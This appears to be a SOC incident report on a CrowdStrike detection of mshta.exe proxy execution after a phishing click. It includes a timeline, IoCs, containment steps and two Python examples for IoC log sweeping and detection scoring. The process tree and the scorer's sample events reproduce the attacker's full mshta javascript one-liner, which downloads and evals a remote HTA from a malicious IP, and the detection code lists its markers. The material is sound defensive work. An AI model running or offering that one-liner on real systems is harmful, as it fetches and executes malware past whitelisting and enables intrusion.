T1218.005 – Mshta Proxy Execution (CrowdStrike Detection)

CrowdStrike Alert Details
Alert ID: CS-Mshta-Proxy-1218-7842
Alert Time: 2024-03-09 10:30:22 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: "Mshta.exe Executing Suspicious Script – Potential Proxy Execution"
MITRE ATT&CK: T1218.005 – System Binary Proxy Execution: Mshta

Alert Details:

Detection: Mshta.exe (HTML Application host) executing script from remote URL

Host: DEV-WS-045 (Development Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Time: 10:25 EST

Process Tree:

explorer.exe (PID: 2341)
    cmd.exe (PID: 4789)
        mshta.exe (PID: 4792)
            Command: mshta.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://185.143.221[.]89/payload.hta",false);h.Send();eval(h.responseText)

Detection Logic:

Mshta.exe executing JavaScript (unusual for this user)
Script downloads and executes HTA payload from remote URL
Parent process cmd.exe (unusual for mshta.exe)
Destination IP known malicious
Pattern matches mshta proxy execution (commonly used for malware)
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed mshta.exe downloading remote script |
| 2. URL Analysis | Analyze payload URL | URLScan.io, VirusTotal | HTA file contains PowerShell download cradle |
| 3. Process Investigation | Identify source | CrowdStrike | User clicked link in email; cmd.exe launched mshta |
| 4. User Interview | Contact alexchen | Teams, Phone | User clicked "document" link; unaware |
| 5. Immediate Action | Terminate mshta.exe | CrowdStrike | Process killed |
| 6. Network Block | Block malicious URL | Palo Alto, Zscaler | URL and IP blocked |

Jira Incident Report
Ticket: SOC-2024-195
Summary: T1218.005 – Mshta Proxy Execution of Remote Payload
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1218, mshta, proxy-execution, crowdstrike, phishing
Components: Endpoint-Security, Web-Security

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: CrowdStrike Falcon EDR.
Alert: “Mshta.exe Executing Suspicious Script – Potential Proxy Execution”.
Host: DEV-WS-045 (Development, user alexchen).
Process: mshta.exe with JavaScript downloading remote HTA.
Time: 2024-03-09 10:30 EST.
Technique: MITRE ATT&CK T1218.005 – System Binary Proxy Execution: Mshta.

2. Technical Analysis:

Attack Chain:

10:10 – User receives phishing email with link
10:12 – User clicks link (to malicious HTA)
10:13 – Browser downloads .hta file (or directly triggers mshta)
10:14 – cmd.exe launches mshta with JavaScript
10:15 – mshta downloads additional payload from 185.143.221[.]89
10:25 – CrowdStrike detects

Mshta Technique:

Mshta.exe is a legitimate Microsoft binary for running HTML Applications
Abuse: Can execute JavaScript/VBScript to download and run malware
Bypass: Often allowed by application whitelisting

Payload Analysis:

URL: http://185.143.221[.]89/payload.hta
Content: HTA file with embedded PowerShell script
PowerShell: Downloads and executes Cobalt Strike beacon

Impact:

Malware attempted to execute (blocked before full execution)

3. Investigation Findings:

Timeline:

10:10 – Email received
10:12 – Link clicked
10:14-10:15 – mshta execution
10:25 – Alert
10:27 – SOC investigates
10:28 – Process terminated
10:29 – URL blocked

Indicators of Compromise (IoCs):

Network:

– URL: http://185.143.221[.]89/payload.hta

– IP: 185.143.221[.]89

Processes:

– mshta.exe with JavaScript
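The indicators above are written defanged (`[.]`), so they have to be refanged before they can be searched for in proxy or firewall logs. The following is an added illustration, not tooling from the report or from CrowdStrike, Zscaler or Palo Alto: it refangs the two network IoCs and sweeps a constructed block of proxy log lines for exact-URL hits and for any other request to the same IP, which is how follow-on requests (such as the beacon stage the report mentions) show up even when the path differs. The log line format and the timestamps are assumptions.

```python
"""Refang the report's defanged network IoCs and sweep constructed proxy log lines for them.
Added illustration; the log lines are constructed, not real Zscaler/Palo Alto output."""
import re
from urllib.parse import urlsplit

def refang(indicator: str) -> str:
    """Undo common defanging: 185.143.221[.]89 -> 185.143.221.89, hxxp:// -> http://."""
    s = indicator.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    return re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)

# IoCs exactly as they appear in the report (defanged)
IOCS = {
    "url": "http://185.143.221[.]89/payload.hta",
    "ip": "185.143.221[.]89",
}

# Constructed proxy log: "<timestamp> <host> <user> <action> <url>" (assumed format, UTC)
SAMPLE_PROXY_LOG = """\
2024-03-09T15:14:58Z DEV-WS-045 alexchen ALLOW http://185.143.221.89/payload.hta
2024-03-09T15:15:02Z DEV-WS-045 alexchen ALLOW http://185.143.221.89/beacon
2024-03-09T15:15:10Z HR-WS-010 jdoe ALLOW https://www.example.com/
2024-03-09T15:16:44Z DEV-WS-045 alexchen BLOCK http://185.143.221.89/payload.hta
"""

def sweep(log_text: str, iocs: dict) -> list:
    """Return (timestamp, host, user, action, match_kind) for every line that touches an IoC.

    match_kind is "exact-url" for the payload URL itself and "ip" for any other request
    whose host component is the malicious IP, so second-stage fetches are not missed.
    """
    url = refang(iocs["url"])
    ip = refang(iocs["ip"])
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:          # skip lines that do not fit the assumed format
            continue
        ts, host, user, action, req_url = parts
        req_host = urlsplit(req_url).hostname or ""
        if req_url == url:
            hits.append((ts, host, user, action, "exact-url"))
        elif req_host == ip:
            hits.append((ts, host, user, action, "ip"))
    return hits

if __name__ == "__main__":
    for hit in sweep(SAMPLE_PROXY_LOG, IOCS):
        print(" ".join(hit))
```

Because the sweep keys on the request host as well as the full URL, it surfaces the `/beacon` request that the exact URL indicator alone would miss, and it shows the later BLOCK entry that confirms the proxy rule took effect.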

4. Containment Actions:

Immediate Actions:

Terminated mshta.exe.
Blocked URL and IP at firewall and proxy.
Isolated host temporarily.
Reset user password.

Host Remediation:

Full scan (clean).
No reimage needed.

5. Root Cause Analysis:

Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering blocking malicious domain.
Mshta allowed to execute scripts.

6. Business Impact:

Operational Impact: Development workstation offline for 1 hour.
Data Exposure: None.

7. Remediation & Prevention:

Completed Actions:

Malicious process terminated.
User educated.

Technical Controls Enhanced:

Blocked mshta.exe from executing script content via AppLocker.
Enhanced URL filtering.
Created alert for mshta with command-line script.
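The detection logic listed in the alert (inline script in the mshta command line, a remote URL, download-and-eval markers, an unexpected parent) and the new alert for mshta with command-line script described above both come down to scoring process-creation telemetry. The block below is an added example, not a CrowdStrike rule or anything from the report: it scores constructed process events against those four signals and raises only the ones that cross a threshold. The event fields, the list of parents considered normal, the marker strings and the weights are all assumptions to be tuned for a given fleet.

```python
"""Heuristic scoring of process-creation events for T1218.005 (mshta proxy execution).
Added illustration; the events below are constructed, not CrowdStrike Falcon telemetry."""
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    host: str
    user: str
    parent: str    # parent image name
    image: str     # full path of the created process
    cmdline: str

# Signals from the alert's detection logic (weights are assumptions)
SCRIPT_PROTOCOL = re.compile(r"\b(javascript|vbscript):", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
DOWNLOAD_MARKERS = ("WinHttpRequest", "XMLHTTP", "eval(", "RunHTMLApplication", "GetObject(")
EXPECTED_PARENTS = {"explorer.exe", "svchost.exe"}   # assumption: normal launchers of mshta

def score_mshta(ev: ProcessEvent):
    """Return (score, reasons) for an event; non-mshta events score 0."""
    if ev.image.lower().rsplit("\\", 1)[-1] != "mshta.exe":
        return 0, []
    score, reasons = 0, []
    cmd = ev.cmdline
    if SCRIPT_PROTOCOL.search(cmd):
        score += 40
        reasons.append("inline script protocol in command line")
    if REMOTE_URL.search(cmd):
        score += 30
        reasons.append("remote URL in command line")
    hits = [m for m in DOWNLOAD_MARKERS if m.lower() in cmd.lower()]
    if hits:
        score += 20
        reasons.append("download/eval markers: " + ", ".join(hits))
    if ev.parent.lower() not in EXPECTED_PARENTS:
        score += 10
        reasons.append(f"unexpected parent {ev.parent}")
    return score, reasons

def triage(events, threshold: int = 50):
    """Return (host, score, reasons) for events at or above the alert threshold."""
    out = []
    for ev in events:
        s, why = score_mshta(ev)
        if s >= threshold:
            out.append((ev.host, s, why))
    return out

# Constructed events: the incident's pattern, a benign local HTA, and a local HTA from cmd.exe
SAMPLE_EVENTS = [
    ProcessEvent("DEV-WS-045", "alexchen", "cmd.exe", r"C:\Windows\System32\mshta.exe",
                 'mshta.exe javascript:"..\\mshtml,RunHTMLApplication ";document.write();'
                 'h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");'
                 'h.Open("GET","http://185.143.221[.]89/payload.hta",false);h.Send();'
                 'eval(h.responseText)'),
    ProcessEvent("HR-WS-010", "jdoe", "explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
    ProcessEvent("DEV-WS-046", "bsmith", "cmd.exe", r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe "C:\Users\bsmith\tools\report.hta"'),
]

if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{host}: {score}")
        for r in reasons:
            print("  -", r)
```

The incident pattern scores on every signal; a locally launched vendor HTA scores nothing; an HTA run from a command prompt earns only the weak parent signal and stays below the threshold, which keeps the alert from firing on ordinary developer workflows while still recording the parent anomaly for hunting.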

8. Conclusion:

An attacker used mshta.exe to download and execute a malicious HTA payload, leveraging a trusted Windows binary. CrowdStrike detected the anomalous behavior and terminated the process before full compromise.

Closure Rationale: Process terminated; URL blocked; user educated.

Analyst: [Your Name], SOC Analyst
Date: 2024-03-09 11:30 EST
